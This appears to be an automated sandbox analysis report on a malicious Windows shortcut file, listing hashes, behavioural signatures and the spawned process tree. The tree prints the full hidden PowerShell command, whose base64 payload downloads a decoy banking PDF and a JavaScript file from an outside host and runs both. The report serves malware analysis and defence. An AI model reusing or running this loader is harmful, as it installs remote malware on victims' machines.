Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
12-07-2024 06:04
Static task
static1
Behavioral task
behavioral1
Sample
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
Resource
win7-20240705-en
windows7-x64
5 signatures
150 seconds
General
-
Target
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
-
Size
2KB
-
MD5
7e7b20e421442d74655685583b4036de
-
SHA1
cf936b1fe122c6a5029c07a64a0f8674b31464af
-
SHA256
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1
-
SHA512
e58df7f695e08bc57c30a518f35c84b9ab70597696d579291b12c2534a06b24018920cd09f4a0652dcca9791eca207646e4ce38f03bf3650c093a8db9ffe9318
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2776 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2400 wrote to memory of 2776 2400 cmd.exe 31 PID 2400 wrote to memory of 2776 2400 cmd.exe 31 PID 2400 wrote to memory of 2776 2400 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$avesqBoj49s = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC9PekZMLnBkZiAtT3V0RmlsZSAkZW52OlRFTVBcT25saW5lIEJhbmtpbmcgUGF5bWVudCBBZHZpY2UucGRmLnBkZjtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxPbmxpbmUgQmFua2luZyBQYXltZW50IEFkdmljZS5wZGYucGRmO1N0YXJ0LVNsZWVwIC1zIDM7U3RhcnQtU2xlZXAgLXMgMztTdGFydC1TbGVlcCAtcyAzO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvTnBsLmpzIC1PdXRGaWxlICRlbnY6VEVNUFxWeEl0RVQuanM7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcVnhJdEVULmpzOyRhaD0nWWV4cjc0SFhXNkRpJztFeGl0';$EtRpa8h = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($avesqBoj49s));Invoke-Expression -Command $EtRpa8h"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-